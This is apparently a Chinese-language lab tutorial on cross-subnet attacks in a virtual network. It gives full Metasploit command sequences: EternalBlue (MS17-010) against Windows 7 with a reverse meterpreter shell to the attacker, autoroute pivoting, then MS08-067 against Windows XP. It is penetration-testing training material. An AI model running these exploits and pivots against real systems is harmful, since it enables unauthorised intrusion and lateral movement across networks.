目录
前言:初学者在使用漏洞进行攻击时,一般都是在同一网段下,所以这次我们来模拟攻击目标主机后,发现其他网段的主机,而后进行跨网段攻击
环境:
Kali Linux
Windows7
winXP
部署:
这里我们将Kali的网卡设置成NAT模式
Windows7的网卡设置成NAT模式和自定义VMnet模式(双网卡)
WinXP设置成VMnet模式
目的是使kali和Windows7在同一网段,Windows7又和WinXP在同一网段,模拟kali攻击windows7后发现其他网段下的WinXP,从而实施跨网段攻击
kali的IP为192.168.10.137
Windows7的IP地址为:192.168.10.131 和kali在同一网段
172.16.10.129 和WinXP在同一网段
Winxp的IP地址为:172.16.10.128 和Windows7在同一网段
模拟攻击Windows7
打开msfconsole使用ms17-010永恒之蓝漏洞进行攻击
search ms17-010 #搜索永恒之蓝漏洞
use exploit/windows/smb/ms17_010_eternalblue #使用攻击模块
set payload windows/x64/meterpreter/reverse_tcp #设置反向连接
set rhosts 192.168.10.131 #设置目标主机IP(Windows7)
set lhost 192.168.10.137 #设置攻击者IP(Kali)
set lport 3333 #设置连接端口(此处一般默认设置了4444)
run #执行攻击
攻击成功并拿到shell终端
这里显示乱码,我们使用chcp 65001进行编码
这里看到除了在同网段的192.168.10.131地址,还发现了其他网段的172.16.10.129的地址
那么接下来就是本次的跨网段攻击环节
跨网段攻击阶段:
使用arp -a查看arp缓存表
发现其他网段下的主机172.16.10.128
想必就是WinXP主机的IP地址了(现实中通过更多信息搜集确定操作系统和服务器,在针对性实施对应的攻击)
由于提前知道是WinXP,所以我们使用ms08-67漏洞进行攻击
退回meterpreter:
run autoroute -s 172.16.10.0/24 #添加172.16.10.0/24网段信息
run autoroute -p #查看路由信息
background #退回msf后台
search ms08-067 #搜索ms08-067漏洞
use exploit/windows/smb/ms08_067_netapi #使用攻击模块
set payload windows/meterpreter/bind_tcp #设置正向连接
set lport 4445 #设置连接端口
set rhost 172.16.10.128 #设置目标主机IP地址(WinXP)
run #执行攻击
我们好像攻击成功了,让我们验证一下(后渗透)
我们截个图看看
到这里就结束了,以上就是跨网段攻击的演示
嘻嘻
如果有不足,请大佬指正